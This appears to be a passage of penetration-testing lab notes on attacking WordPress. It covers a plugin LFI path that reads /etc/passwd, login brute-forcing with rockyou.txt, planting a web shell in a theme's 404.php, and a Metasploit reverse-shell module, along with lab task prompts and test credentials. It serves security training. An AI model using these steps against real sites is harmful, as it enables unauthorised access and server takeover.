🧊Exploitation
Vulnerable Plugin
Let's say we identified via a WPScan an outdated theme or plugin known to be vulnerable to SQL Injection as well as Local File Inclusion (LFI).
We can verify if the LFI can be exploited based on this exploit-db report. The exploit states that any unauthenticated user can read local files through the path: /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
Or through cURL ->
User Bruteforce
The tool uses two kinds of login brute force attacks, xmlrpc
and wp-login
. The wp-login
method will attempt to brute force the normal WordPress login page, while the xmlrpc
method uses the WordPress API to make login attempts through /xmlrpc.php
.
Perform a bruteforce attack against the user "roger" on your target with the wordlist "rockyou.txt". Submit the user's password as the answer.
RCE via the Theme Editor
With administrative access to WordPress, we can modify the PHP source code to execute system commands. Once we're logged in, we click on Appearance
on the side panel and select Theme Editor
. This page will allow us to edit the PHP source code directly.
We can see that the active theme is Transportex
so an unused theme such as Twenty Seventeen
should be chosen instead.
Choose a theme and click on Select
. Next, choose a non-critical file such as 404.php
to modify and add a web shell.
And now we should be able to use a webshell using the 404.php?cmd=id
.
And we can check this with the following cURL command:
Use the credentials for the admin user [admin:sunshine1] and upload a webshell to your target. Once you have access to the target, obtain the contents of the "flag.txt" file in the home directory for the "wp-user" directory.
Attacking with Metasploit
To obtain the reverse shell, we can use the wp_admin_shell_upload
module. We can easily search for it inside MSF
:
Once we set all of the options for this module and we hit run, it will launch a reverse shell
Last updated